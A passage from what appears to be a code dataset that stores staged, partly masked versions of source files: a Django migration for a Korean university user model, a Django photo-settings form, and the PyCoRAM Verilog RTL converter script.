"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('users', '0004_auto_20191230_2037')]\n operations = [migrations.AddField(model_name='user', name='circles',\n field=models.CharField(choices=[('NUX', 'NUXPIA'), ('NET', 'NET'),\n ('DOT', 'DOT-GABI'), ('IMA', 'IMAGINE'), ('PNN', 'P&N'), ('MEG',\n 'MEGA-BRAIN')], max_length=18, null=True, verbose_name='동아리')),\n migrations.AddField(model_name='user', name='department', field=\n models.CharField(choices=[('OTHERS', '학부생이 아님'), ('CS', '컴퓨터공학부'),\n ('DRON', '드론IOT시뮬레이션학부'), ('MED', '의과대학'), ('LIB', '문리과대학'), ('SOC',\n '사회과학대학'), ('ENG', '공과대학'), ('HEL', '보건의료융합대학'), ('BNIT',\n 'BNIT융합대학'), ('PHA', '약학대학')], max_length=24, null=True,\n verbose_name='학과')), migrations.AlterField(model_name='user', name=\n 'level', field=models.CharField(choices=[('3', 'Lv3_미인증사용자'), ('2',\n 'Lv2_인증사용자'), ('1', 'Lv1_관리자'), ('0', 'Lv0_개발자')], default=3,\n max_length=18, verbose_name='등급'))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('users', '0004_auto_20191230_2037')]\n operations = [migrations.AddField(model_name='user', name='circles',\n field=models.CharField(choices=[('NUX', 'NUXPIA'), ('NET', 'NET'),\n ('DOT', 'DOT-GABI'), ('IMA', 'IMAGINE'), ('PNN', 'P&N'), ('MEG',\n 'MEGA-BRAIN')], max_length=18, null=True, verbose_name='동아리')),\n migrations.AddField(model_name='user', name='department', field=\n models.CharField(choices=[('OTHERS', '학부생이 아님'), ('CS', '컴퓨터공학부'),\n ('DRON', '드론IOT시뮬레이션학부'), ('MED', '의과대학'), ('LIB', '문리과대학'), ('SOC',\n '사회과학대학'), ('ENG', '공과대학'), ('HEL', '보건의료융합대학'), ('BNIT',\n 'BNIT융합대학'), ('PHA', '약학대학')], max_length=24, null=True,\n verbose_name='학과')), migrations.AlterField(model_name='user', name=\n 'level', field=models.CharField(choices=[('3', 'Lv3_미인증사용자'), ('2',\n 'Lv2_인증사용자'), ('1', 'Lv1_관리자'), ('0', 'Lv0_개발자')], default=3,\n max_length=18, verbose_name='등급'))]\n",
"step-5": "# Generated by Django 3.0.1 on 2020-01-11 19:59\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('users', '0004_auto_20191230_2037'),\r\n ]\r\n\r\n operations = [\r\n migrations.AddField(\r\n model_name='user',\r\n name='circles',\r\n field=models.CharField(choices=[('NUX', 'NUXPIA'), ('NET', 'NET'), ('DOT', 'DOT-GABI'), ('IMA', 'IMAGINE'), ('PNN', 'P&N'), ('MEG', 'MEGA-BRAIN')], max_length=18, null=True, verbose_name='동아리'),\r\n ),\r\n migrations.AddField(\r\n model_name='user',\r\n name='department',\r\n field=models.CharField(choices=[('OTHERS', '학부생이 아님'), ('CS', '컴퓨터공학부'), ('DRON', '드론IOT시뮬레이션학부'), ('MED', '의과대학'), ('LIB', '문리과대학'), ('SOC', '사회과학대학'), ('ENG', '공과대학'), ('HEL', '보건의료융합대학'), ('BNIT', 'BNIT융합대학'), ('PHA', '약학대학')], max_length=24, null=True, verbose_name='학과'),\r\n ),\r\n migrations.AlterField(\r\n model_name='user',\r\n name='level',\r\n field=models.CharField(choices=[('3', 'Lv3_미인증사용자'), ('2', 'Lv2_인증사용자'), ('1', 'Lv1_관리자'), ('0', 'Lv0_개발자')], default=3, max_length=18, verbose_name='등급'),\r\n ),\r\n ]\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from django import forms
class photoForm(forms.Form):
iso = forms.ChoiceField(label='ISO', choices=[("100", 100),
("200", 200),
("300", 300),
("400", 400),
("500", 500),
("600", 600),
("700", 700),
("800", 800)], initial=800)
shutterspeed = forms.FloatField(label='Shutter Speed', initial=6.0)
|
normal
|
{
"blob_id": "19b55b2de3d2ed16275cef572e3518fbb2457f84",
"index": 8293,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass photoForm(forms.Form):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass photoForm(forms.Form):\n iso = forms.ChoiceField(label='ISO', choices=[('100', 100), ('200', 200\n ), ('300', 300), ('400', 400), ('500', 500), ('600', 600), ('700', \n 700), ('800', 800)], initial=800)\n shutterspeed = forms.FloatField(label='Shutter Speed', initial=6.0)\n",
"step-4": "from django import forms\n\n\nclass photoForm(forms.Form):\n iso = forms.ChoiceField(label='ISO', choices=[('100', 100), ('200', 200\n ), ('300', 300), ('400', 400), ('500', 500), ('600', 600), ('700', \n 700), ('800', 800)], initial=800)\n shutterspeed = forms.FloatField(label='Shutter Speed', initial=6.0)\n",
"step-5": "from django import forms\n\nclass photoForm(forms.Form):\n iso = forms.ChoiceField(label='ISO', choices=[(\"100\", 100),\n (\"200\", 200),\n (\"300\", 300),\n (\"400\", 400),\n (\"500\", 500),\n (\"600\", 600),\n (\"700\", 700),\n (\"800\", 800)], initial=800)\n shutterspeed = forms.FloatField(label='Shutter Speed', initial=6.0)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#-------------------------------------------------------------------------------
# rtlconverter.py
#
# PyCoRAM RTL Converter
#
# Copyright (C) 2013, Shinya Takamaeda-Yamazaki
# License: Apache 2.0
#-------------------------------------------------------------------------------
import sys
import os
import subprocess
import copy
import collections
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))) )
import utils.version
if sys.version_info[0] >= 3:
from rtlconverter.convertvisitor import InstanceConvertVisitor
from rtlconverter.convertvisitor import InstanceReplaceVisitor
else:
from convertvisitor import InstanceConvertVisitor
from convertvisitor import InstanceReplaceVisitor
import pyverilog.utils.signaltype as signaltype
from pyverilog.utils.scope import ScopeLabel, ScopeChain
import pyverilog.vparser.ast as vast
from pyverilog.vparser.parser import VerilogCodeParser
from pyverilog.dataflow.modulevisitor import ModuleVisitor
from pyverilog.ast_code_generator.codegen import ASTCodeGenerator
class RtlConverter(object):
def __init__(self, filelist, topmodule='userlogic', include=None,
define=None, single_clock=False):
self.filelist = filelist
self.topmodule = topmodule
self.include = include
self.define = define
self.single_clock = single_clock
self.top_parameters = collections.OrderedDict()
self.top_ioports = collections.OrderedDict()
self.coram_object = collections.OrderedDict()
def getTopParameters(self):
return self.top_parameters
def getTopIOPorts(self):
return self.top_ioports
def getCoramObject(self):
return self.coram_object
def dumpCoramObject(self):
coram_object = self.getCoramObject()
print("----------------------------------------")
print("CoRAM Objects in User-defined RTL")
for mode, coram_items in coram_object.items():
print(" CoRAM %s" % mode)
for threadname, idx, subid, addrwidth, datawidth in sorted(coram_items, key=lambda x:x[1]):
print(" %s(ID:%d%s Thread:%s AddrWidth:%s DataWidth:%s)" %
(mode, idx, ( '' if subid is None else ''.join( ('[', str(subid), ']') ) ),
threadname, str(addrwidth), str(datawidth)))
def generate(self):
preprocess_define = []
if self.single_clock:
preprocess_define.append('CORAM_SINGLE_CLOCK')
if self.define:
preprocess_define.extend(self.define)
code_parser = VerilogCodeParser(self.filelist,
preprocess_include=self.include,
preprocess_define=preprocess_define)
ast = code_parser.parse()
module_visitor = ModuleVisitor()
module_visitor.visit(ast)
modulenames = module_visitor.get_modulenames()
moduleinfotable = module_visitor.get_moduleinfotable()
instanceconvert_visitor = InstanceConvertVisitor(moduleinfotable, self.topmodule)
instanceconvert_visitor.start_visit()
replaced_instance = instanceconvert_visitor.getMergedReplacedInstance()
replaced_instports = instanceconvert_visitor.getReplacedInstPorts()
replaced_items = instanceconvert_visitor.getReplacedItems()
new_moduleinfotable = instanceconvert_visitor.get_new_moduleinfotable()
instancereplace_visitor = InstanceReplaceVisitor(replaced_instance,
replaced_instports,
replaced_items,
new_moduleinfotable)
ret = instancereplace_visitor.getAST()
# gather user-defined io-ports on top-module and parameters to connect external
frametable = instanceconvert_visitor.getFrameTable()
top_ioports = []
for i in moduleinfotable.getIOPorts(self.topmodule):
if signaltype.isClock(i) or signaltype.isReset(i): continue
top_ioports.append(i)
top_scope = ScopeChain( [ScopeLabel(self.topmodule, 'module')] )
top_sigs = frametable.getSignals(top_scope)
top_params = frametable.getConsts(top_scope)
for sk, sv in top_sigs.items():
if len(sk) > 2: continue
signame = sk[1].scopename
for svv in sv:
if (signame in top_ioports and
not (signaltype.isClock(signame) or signaltype.isReset(signame)) and
isinstance(svv, vast.Input) or isinstance(svv, vast.Output) or isinstance(svv, vast.Inout)):
port = svv
msb_val = instanceconvert_visitor.optimize(instanceconvert_visitor.getTree(port.width.msb, top_scope))
lsb_val = instanceconvert_visitor.optimize(instanceconvert_visitor.getTree(port.width.lsb, top_scope))
width = int(msb_val.value) - int(lsb_val.value) + 1
self.top_ioports[signame] = (port, width)
break
for ck, cv in top_params.items():
if len(ck) > 2: continue
signame = ck[1].scopename
param = cv[0]
if isinstance(param, vast.Genvar): continue
self.top_parameters[signame] = param
self.coram_object = instanceconvert_visitor.getCoramObject()
return ret
def main():
from optparse import OptionParser
INFO = "PyCoRAM RTL Converter"
VERSION = utils.version.VERSION
USAGE = "Usage: python rtlconverter.py -t TOPMODULE file ..."
def showVersion():
print(INFO)
print(VERSION)
print(USAGE)
sys.exit()
optparser = OptionParser()
optparser.add_option("-v","--version",action="store_true",dest="showversion",
default=False,help="Show the version")
optparser.add_option("-t","--top",dest="topmodule",
default="userlogic",help="Top module, Default=userlogic")
optparser.add_option("-o","--output",dest="outputfile",
default="out.v",help="Output file name, Default=out.v")
optparser.add_option("-I","--include",dest="include",action="append",
default=[],help="Include path")
optparser.add_option("-D",dest="define",action="append",
default=[],help="Macro Definition")
optparser.add_option("--singleclock",action="store_true",dest="single_clock",
default=False,help="Use single clock mode")
(options, args) = optparser.parse_args()
filelist = args
if options.showversion:
showVersion()
for f in filelist:
if not os.path.exists(f): raise IOError("file not found: " + f)
if len(filelist) == 0:
showVersion()
converter = RtlConverter(filelist, options.topmodule,
include=options.include,
define=options.define,
single_clock=options.single_clock)
ast = converter.generate()
converter.dumpCoramObject()
asttocode = ASTCodeGenerator()
code = asttocode.visit(ast)
f = open(options.outputfile, 'w')
f.write(code)
f.close()
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "55ffcf5e6120cc07da461e30979dd8a36a599bee",
"index": 8353,
"step-1": "<mask token>\n\n\nclass RtlConverter(object):\n\n def __init__(self, filelist, topmodule='userlogic', include=None,\n define=None, single_clock=False):\n self.filelist = filelist\n self.topmodule = topmodule\n self.include = include\n self.define = define\n self.single_clock = single_clock\n self.top_parameters = collections.OrderedDict()\n self.top_ioports = collections.OrderedDict()\n self.coram_object = collections.OrderedDict()\n\n def getTopParameters(self):\n return self.top_parameters\n\n def getTopIOPorts(self):\n return self.top_ioports\n\n def getCoramObject(self):\n return self.coram_object\n\n def dumpCoramObject(self):\n coram_object = self.getCoramObject()\n print('----------------------------------------')\n print('CoRAM Objects in User-defined RTL')\n for mode, coram_items in coram_object.items():\n print(' CoRAM %s' % mode)\n for threadname, idx, subid, addrwidth, datawidth in sorted(\n coram_items, key=lambda x: x[1]):\n print(' %s(ID:%d%s Thread:%s AddrWidth:%s DataWidth:%s)' %\n (mode, idx, '' if subid is None else ''.join(('[', str(\n subid), ']')), threadname, str(addrwidth), str(datawidth)))\n\n def generate(self):\n preprocess_define = []\n if self.single_clock:\n preprocess_define.append('CORAM_SINGLE_CLOCK')\n if self.define:\n preprocess_define.extend(self.define)\n code_parser = VerilogCodeParser(self.filelist, preprocess_include=\n self.include, preprocess_define=preprocess_define)\n ast = code_parser.parse()\n module_visitor = ModuleVisitor()\n module_visitor.visit(ast)\n modulenames = module_visitor.get_modulenames()\n moduleinfotable = module_visitor.get_moduleinfotable()\n instanceconvert_visitor = InstanceConvertVisitor(moduleinfotable,\n self.topmodule)\n instanceconvert_visitor.start_visit()\n replaced_instance = instanceconvert_visitor.getMergedReplacedInstance()\n replaced_instports = instanceconvert_visitor.getReplacedInstPorts()\n replaced_items = instanceconvert_visitor.getReplacedItems()\n new_moduleinfotable = instanceconvert_visitor.get_new_moduleinfotable()\n instancereplace_visitor = InstanceReplaceVisitor(replaced_instance,\n replaced_instports, replaced_items, new_moduleinfotable)\n ret = instancereplace_visitor.getAST()\n frametable = instanceconvert_visitor.getFrameTable()\n top_ioports = []\n for i in moduleinfotable.getIOPorts(self.topmodule):\n if signaltype.isClock(i) or signaltype.isReset(i):\n continue\n top_ioports.append(i)\n top_scope = ScopeChain([ScopeLabel(self.topmodule, 'module')])\n top_sigs = frametable.getSignals(top_scope)\n top_params = frametable.getConsts(top_scope)\n for sk, sv in top_sigs.items():\n if len(sk) > 2:\n continue\n signame = sk[1].scopename\n for svv in sv:\n if signame in top_ioports and not (signaltype.isClock(\n signame) or signaltype.isReset(signame)) and isinstance(svv\n , vast.Input) or isinstance(svv, vast.Output\n ) or isinstance(svv, vast.Inout):\n port = svv\n msb_val = instanceconvert_visitor.optimize(\n instanceconvert_visitor.getTree(port.width.msb,\n top_scope))\n lsb_val = instanceconvert_visitor.optimize(\n instanceconvert_visitor.getTree(port.width.lsb,\n top_scope))\n width = int(msb_val.value) - int(lsb_val.value) + 1\n self.top_ioports[signame] = port, width\n break\n for ck, cv in top_params.items():\n if len(ck) > 2:\n continue\n signame = ck[1].scopename\n param = cv[0]\n if isinstance(param, vast.Genvar):\n continue\n self.top_parameters[signame] = param\n self.coram_object = instanceconvert_visitor.getCoramObject()\n return ret\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass RtlConverter(object):\n\n def __init__(self, filelist, topmodule='userlogic', include=None,\n define=None, single_clock=False):\n self.filelist = filelist\n self.topmodule = topmodule\n self.include = include\n self.define = define\n self.single_clock = single_clock\n self.top_parameters = collections.OrderedDict()\n self.top_ioports = collections.OrderedDict()\n self.coram_object = collections.OrderedDict()\n\n def getTopParameters(self):\n return self.top_parameters\n\n def getTopIOPorts(self):\n return self.top_ioports\n\n def getCoramObject(self):\n return self.coram_object\n\n def dumpCoramObject(self):\n coram_object = self.getCoramObject()\n print('----------------------------------------')\n print('CoRAM Objects in User-defined RTL')\n for mode, coram_items in coram_object.items():\n print(' CoRAM %s' % mode)\n for threadname, idx, subid, addrwidth, datawidth in sorted(\n coram_items, key=lambda x: x[1]):\n print(' %s(ID:%d%s Thread:%s AddrWidth:%s DataWidth:%s)' %\n (mode, idx, '' if subid is None else ''.join(('[', str(\n subid), ']')), threadname, str(addrwidth), str(datawidth)))\n\n def generate(self):\n preprocess_define = []\n if self.single_clock:\n preprocess_define.append('CORAM_SINGLE_CLOCK')\n if self.define:\n preprocess_define.extend(self.define)\n code_parser = VerilogCodeParser(self.filelist, preprocess_include=\n self.include, preprocess_define=preprocess_define)\n ast = code_parser.parse()\n module_visitor = ModuleVisitor()\n module_visitor.visit(ast)\n modulenames = module_visitor.get_modulenames()\n moduleinfotable = module_visitor.get_moduleinfotable()\n instanceconvert_visitor = InstanceConvertVisitor(moduleinfotable,\n self.topmodule)\n instanceconvert_visitor.start_visit()\n replaced_instance = instanceconvert_visitor.getMergedReplacedInstance()\n replaced_instports = instanceconvert_visitor.getReplacedInstPorts()\n replaced_items = instanceconvert_visitor.getReplacedItems()\n new_moduleinfotable = instanceconvert_visitor.get_new_moduleinfotable()\n instancereplace_visitor = InstanceReplaceVisitor(replaced_instance,\n replaced_instports, replaced_items, new_moduleinfotable)\n ret = instancereplace_visitor.getAST()\n frametable = instanceconvert_visitor.getFrameTable()\n top_ioports = []\n for i in moduleinfotable.getIOPorts(self.topmodule):\n if signaltype.isClock(i) or signaltype.isReset(i):\n continue\n top_ioports.append(i)\n top_scope = ScopeChain([ScopeLabel(self.topmodule, 'module')])\n top_sigs = frametable.getSignals(top_scope)\n top_params = frametable.getConsts(top_scope)\n for sk, sv in top_sigs.items():\n if len(sk) > 2:\n continue\n signame = sk[1].scopename\n for svv in sv:\n if signame in top_ioports and not (signaltype.isClock(\n signame) or signaltype.isReset(signame)) and isinstance(svv\n , vast.Input) or isinstance(svv, vast.Output\n ) or isinstance(svv, vast.Inout):\n port = svv\n msb_val = instanceconvert_visitor.optimize(\n instanceconvert_visitor.getTree(port.width.msb,\n top_scope))\n lsb_val = instanceconvert_visitor.optimize(\n instanceconvert_visitor.getTree(port.width.lsb,\n top_scope))\n width = int(msb_val.value) - int(lsb_val.value) + 1\n self.top_ioports[signame] = port, width\n break\n for ck, cv in top_params.items():\n if len(ck) > 2:\n continue\n signame = ck[1].scopename\n param = cv[0]\n if isinstance(param, vast.Genvar):\n continue\n self.top_parameters[signame] = param\n self.coram_object = instanceconvert_visitor.getCoramObject()\n return ret\n\n\ndef main():\n from optparse import OptionParser\n INFO = 'PyCoRAM RTL Converter'\n VERSION = utils.version.VERSION\n USAGE = 'Usage: python rtlconverter.py -t TOPMODULE file ...'\n\n def showVersion():\n print(INFO)\n print(VERSION)\n print(USAGE)\n sys.exit()\n optparser = OptionParser()\n optparser.add_option('-v', '--version', action='store_true', dest=\n 'showversion', default=False, help='Show the version')\n optparser.add_option('-t', '--top', dest='topmodule', default=\n 'userlogic', help='Top module, Default=userlogic')\n optparser.add_option('-o', '--output', dest='outputfile', default=\n 'out.v', help='Output file name, Default=out.v')\n optparser.add_option('-I', '--include', dest='include', action='append',\n default=[], help='Include path')\n optparser.add_option('-D', dest='define', action='append', default=[],\n help='Macro Definition')\n optparser.add_option('--singleclock', action='store_true', dest=\n 'single_clock', default=False, help='Use single clock mode')\n options, args = optparser.parse_args()\n filelist = args\n if options.showversion:\n showVersion()\n for f in filelist:\n if not os.path.exists(f):\n raise IOError('file not found: ' + f)\n if len(filelist) == 0:\n showVersion()\n converter = RtlConverter(filelist, options.topmodule, include=options.\n include, define=options.define, single_clock=options.single_clock)\n ast = converter.generate()\n converter.dumpCoramObject()\n asttocode = ASTCodeGenerator()\n code = asttocode.visit(ast)\n f = open(options.outputfile, 'w')\n f.write(code)\n f.close()\n\n\n<mask token>\n",
"step-3": "<mask token>\nsys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n<mask token>\nif sys.version_info[0] >= 3:\n from rtlconverter.convertvisitor import InstanceConvertVisitor\n from rtlconverter.convertvisitor import InstanceReplaceVisitor\nelse:\n from convertvisitor import InstanceConvertVisitor\n from convertvisitor import InstanceReplaceVisitor\n<mask token>\n\n\nclass RtlConverter(object):\n\n def __init__(self, filelist, topmodule='userlogic', include=None,\n define=None, single_clock=False):\n self.filelist = filelist\n self.topmodule = topmodule\n self.include = include\n self.define = define\n self.single_clock = single_clock\n self.top_parameters = collections.OrderedDict()\n self.top_ioports = collections.OrderedDict()\n self.coram_object = collections.OrderedDict()\n\n def getTopParameters(self):\n return self.top_parameters\n\n def getTopIOPorts(self):\n return self.top_ioports\n\n def getCoramObject(self):\n return self.coram_object\n\n def dumpCoramObject(self):\n coram_object = self.getCoramObject()\n print('----------------------------------------')\n print('CoRAM Objects in User-defined RTL')\n for mode, coram_items in coram_object.items():\n print(' CoRAM %s' % mode)\n for threadname, idx, subid, addrwidth, datawidth in sorted(\n coram_items, key=lambda x: x[1]):\n print(' %s(ID:%d%s Thread:%s AddrWidth:%s DataWidth:%s)' %\n (mode, idx, '' if subid is None else ''.join(('[', str(\n subid), ']')), threadname, str(addrwidth), str(datawidth)))\n\n def generate(self):\n preprocess_define = []\n if self.single_clock:\n preprocess_define.append('CORAM_SINGLE_CLOCK')\n if self.define:\n preprocess_define.extend(self.define)\n code_parser = VerilogCodeParser(self.filelist, preprocess_include=\n self.include, preprocess_define=preprocess_define)\n ast = code_parser.parse()\n module_visitor = ModuleVisitor()\n module_visitor.visit(ast)\n modulenames = module_visitor.get_modulenames()\n moduleinfotable = module_visitor.get_moduleinfotable()\n instanceconvert_visitor = InstanceConvertVisitor(moduleinfotable,\n self.topmodule)\n instanceconvert_visitor.start_visit()\n replaced_instance = instanceconvert_visitor.getMergedReplacedInstance()\n replaced_instports = instanceconvert_visitor.getReplacedInstPorts()\n replaced_items = instanceconvert_visitor.getReplacedItems()\n new_moduleinfotable = instanceconvert_visitor.get_new_moduleinfotable()\n instancereplace_visitor = InstanceReplaceVisitor(replaced_instance,\n replaced_instports, replaced_items, new_moduleinfotable)\n ret = instancereplace_visitor.getAST()\n frametable = instanceconvert_visitor.getFrameTable()\n top_ioports = []\n for i in moduleinfotable.getIOPorts(self.topmodule):\n if signaltype.isClock(i) or signaltype.isReset(i):\n continue\n top_ioports.append(i)\n top_scope = ScopeChain([ScopeLabel(self.topmodule, 'module')])\n top_sigs = frametable.getSignals(top_scope)\n top_params = frametable.getConsts(top_scope)\n for sk, sv in top_sigs.items():\n if len(sk) > 2:\n continue\n signame = sk[1].scopename\n for svv in sv:\n if signame in top_ioports and not (signaltype.isClock(\n signame) or signaltype.isReset(signame)) and isinstance(svv\n , vast.Input) or isinstance(svv, vast.Output\n ) or isinstance(svv, vast.Inout):\n port = svv\n msb_val = instanceconvert_visitor.optimize(\n instanceconvert_visitor.getTree(port.width.msb,\n top_scope))\n lsb_val = instanceconvert_visitor.optimize(\n instanceconvert_visitor.getTree(port.width.lsb,\n top_scope))\n width = int(msb_val.value) - int(lsb_val.value) + 1\n self.top_ioports[signame] = port, width\n break\n for ck, cv in top_params.items():\n if len(ck) > 2:\n continue\n signame = ck[1].scopename\n param = cv[0]\n if isinstance(param, vast.Genvar):\n continue\n self.top_parameters[signame] = param\n self.coram_object = instanceconvert_visitor.getCoramObject()\n return ret\n\n\ndef main():\n from optparse import OptionParser\n INFO = 'PyCoRAM RTL Converter'\n VERSION = utils.version.VERSION\n USAGE = 'Usage: python rtlconverter.py -t TOPMODULE file ...'\n\n def showVersion():\n print(INFO)\n print(VERSION)\n print(USAGE)\n sys.exit()\n optparser = OptionParser()\n optparser.add_option('-v', '--version', action='store_true', dest=\n 'showversion', default=False, help='Show the version')\n optparser.add_option('-t', '--top', dest='topmodule', default=\n 'userlogic', help='Top module, Default=userlogic')\n optparser.add_option('-o', '--output', dest='outputfile', default=\n 'out.v', help='Output file name, Default=out.v')\n optparser.add_option('-I', '--include', dest='include', action='append',\n default=[], help='Include path')\n optparser.add_option('-D', dest='define', action='append', default=[],\n help='Macro Definition')\n optparser.add_option('--singleclock', action='store_true', dest=\n 'single_clock', default=False, help='Use single clock mode')\n options, args = optparser.parse_args()\n filelist = args\n if options.showversion:\n showVersion()\n for f in filelist:\n if not os.path.exists(f):\n raise IOError('file not found: ' + f)\n if len(filelist) == 0:\n showVersion()\n converter = RtlConverter(filelist, options.topmodule, include=options.\n include, define=options.define, single_clock=options.single_clock)\n ast = converter.generate()\n converter.dumpCoramObject()\n asttocode = ASTCodeGenerator()\n code = asttocode.visit(ast)\n f = open(options.outputfile, 'w')\n f.write(code)\n f.close()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import sys\nimport os\nimport subprocess\nimport copy\nimport collections\nsys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nimport utils.version\nif sys.version_info[0] >= 3:\n from rtlconverter.convertvisitor import InstanceConvertVisitor\n from rtlconverter.convertvisitor import InstanceReplaceVisitor\nelse:\n from convertvisitor import InstanceConvertVisitor\n from convertvisitor import InstanceReplaceVisitor\nimport pyverilog.utils.signaltype as signaltype\nfrom pyverilog.utils.scope import ScopeLabel, ScopeChain\nimport pyverilog.vparser.ast as vast\nfrom pyverilog.vparser.parser import VerilogCodeParser\nfrom pyverilog.dataflow.modulevisitor import ModuleVisitor\nfrom pyverilog.ast_code_generator.codegen import ASTCodeGenerator\n\n\nclass RtlConverter(object):\n\n def __init__(self, filelist, topmodule='userlogic', include=None,\n define=None, single_clock=False):\n self.filelist = filelist\n self.topmodule = topmodule\n self.include = include\n self.define = define\n self.single_clock = single_clock\n self.top_parameters = collections.OrderedDict()\n self.top_ioports = collections.OrderedDict()\n self.coram_object = collections.OrderedDict()\n\n def getTopParameters(self):\n return self.top_parameters\n\n def getTopIOPorts(self):\n return self.top_ioports\n\n def getCoramObject(self):\n return self.coram_object\n\n def dumpCoramObject(self):\n coram_object = self.getCoramObject()\n print('----------------------------------------')\n print('CoRAM Objects in User-defined RTL')\n for mode, coram_items in coram_object.items():\n print(' CoRAM %s' % mode)\n for threadname, idx, subid, addrwidth, datawidth in sorted(\n coram_items, key=lambda x: x[1]):\n print(' %s(ID:%d%s Thread:%s AddrWidth:%s DataWidth:%s)' %\n (mode, idx, '' if subid is None else ''.join(('[', str(\n subid), ']')), threadname, str(addrwidth), str(datawidth)))\n\n def generate(self):\n preprocess_define = []\n if self.single_clock:\n preprocess_define.append('CORAM_SINGLE_CLOCK')\n if self.define:\n preprocess_define.extend(self.define)\n code_parser = VerilogCodeParser(self.filelist, preprocess_include=\n self.include, preprocess_define=preprocess_define)\n ast = code_parser.parse()\n module_visitor = ModuleVisitor()\n module_visitor.visit(ast)\n modulenames = module_visitor.get_modulenames()\n moduleinfotable = module_visitor.get_moduleinfotable()\n instanceconvert_visitor = InstanceConvertVisitor(moduleinfotable,\n self.topmodule)\n instanceconvert_visitor.start_visit()\n replaced_instance = instanceconvert_visitor.getMergedReplacedInstance()\n replaced_instports = instanceconvert_visitor.getReplacedInstPorts()\n replaced_items = instanceconvert_visitor.getReplacedItems()\n new_moduleinfotable = instanceconvert_visitor.get_new_moduleinfotable()\n instancereplace_visitor = InstanceReplaceVisitor(replaced_instance,\n replaced_instports, replaced_items, new_moduleinfotable)\n ret = instancereplace_visitor.getAST()\n frametable = instanceconvert_visitor.getFrameTable()\n top_ioports = []\n for i in moduleinfotable.getIOPorts(self.topmodule):\n if signaltype.isClock(i) or signaltype.isReset(i):\n continue\n top_ioports.append(i)\n top_scope = ScopeChain([ScopeLabel(self.topmodule, 'module')])\n top_sigs = frametable.getSignals(top_scope)\n top_params = frametable.getConsts(top_scope)\n for sk, sv in top_sigs.items():\n if len(sk) > 2:\n continue\n signame = sk[1].scopename\n for svv in sv:\n if signame in top_ioports and not (signaltype.isClock(\n signame) or signaltype.isReset(signame)) and isinstance(svv\n , vast.Input) or isinstance(svv, vast.Output\n ) or isinstance(svv, vast.Inout):\n port = svv\n msb_val = instanceconvert_visitor.optimize(\n instanceconvert_visitor.getTree(port.width.msb,\n top_scope))\n lsb_val = instanceconvert_visitor.optimize(\n instanceconvert_visitor.getTree(port.width.lsb,\n top_scope))\n width = int(msb_val.value) - int(lsb_val.value) + 1\n self.top_ioports[signame] = port, width\n break\n for ck, cv in top_params.items():\n if len(ck) > 2:\n continue\n signame = ck[1].scopename\n param = cv[0]\n if isinstance(param, vast.Genvar):\n continue\n self.top_parameters[signame] = param\n self.coram_object = instanceconvert_visitor.getCoramObject()\n return ret\n\n\ndef main():\n from optparse import OptionParser\n INFO = 'PyCoRAM RTL Converter'\n VERSION = utils.version.VERSION\n USAGE = 'Usage: python rtlconverter.py -t TOPMODULE file ...'\n\n def showVersion():\n print(INFO)\n print(VERSION)\n print(USAGE)\n sys.exit()\n optparser = OptionParser()\n optparser.add_option('-v', '--version', action='store_true', dest=\n 'showversion', default=False, help='Show the version')\n optparser.add_option('-t', '--top', dest='topmodule', default=\n 'userlogic', help='Top module, Default=userlogic')\n optparser.add_option('-o', '--output', dest='outputfile', default=\n 'out.v', help='Output file name, Default=out.v')\n optparser.add_option('-I', '--include', dest='include', action='append',\n default=[], help='Include path')\n optparser.add_option('-D', dest='define', action='append', default=[],\n help='Macro Definition')\n optparser.add_option('--singleclock', action='store_true', dest=\n 'single_clock', default=False, help='Use single clock mode')\n options, args = optparser.parse_args()\n filelist = args\n if options.showversion:\n showVersion()\n for f in filelist:\n if not os.path.exists(f):\n raise IOError('file not found: ' + f)\n if len(filelist) == 0:\n showVersion()\n converter = RtlConverter(filelist, options.topmodule, include=options.\n include, define=options.define, single_clock=options.single_clock)\n ast = converter.generate()\n converter.dumpCoramObject()\n asttocode = ASTCodeGenerator()\n code = asttocode.visit(ast)\n f = open(options.outputfile, 'w')\n f.write(code)\n f.close()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#-------------------------------------------------------------------------------\n# rtlconverter.py\n# \n# PyCoRAM RTL Converter\n#\n# Copyright (C) 2013, Shinya Takamaeda-Yamazaki\n# License: Apache 2.0\n#-------------------------------------------------------------------------------\nimport sys\nimport os\nimport subprocess\nimport copy\nimport collections\n\nsys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))) )\n\nimport utils.version\n\nif sys.version_info[0] >= 3:\n from rtlconverter.convertvisitor import InstanceConvertVisitor\n from rtlconverter.convertvisitor import InstanceReplaceVisitor\nelse:\n from convertvisitor import InstanceConvertVisitor\n from convertvisitor import InstanceReplaceVisitor\n\nimport pyverilog.utils.signaltype as signaltype\nfrom pyverilog.utils.scope import ScopeLabel, ScopeChain\nimport pyverilog.vparser.ast as vast\nfrom pyverilog.vparser.parser import VerilogCodeParser\nfrom pyverilog.dataflow.modulevisitor import ModuleVisitor\nfrom pyverilog.ast_code_generator.codegen import ASTCodeGenerator\n\nclass RtlConverter(object):\n def __init__(self, filelist, topmodule='userlogic', include=None,\n define=None, single_clock=False):\n self.filelist = filelist\n self.topmodule = topmodule\n self.include = include\n self.define = define\n self.single_clock = single_clock\n\n self.top_parameters = collections.OrderedDict()\n self.top_ioports = collections.OrderedDict()\n self.coram_object = collections.OrderedDict()\n\n def getTopParameters(self):\n return self.top_parameters\n \n def getTopIOPorts(self):\n return self.top_ioports\n\n def getCoramObject(self):\n return self.coram_object\n\n def dumpCoramObject(self):\n coram_object = self.getCoramObject()\n print(\"----------------------------------------\")\n print(\"CoRAM Objects in User-defined RTL\")\n for mode, coram_items in 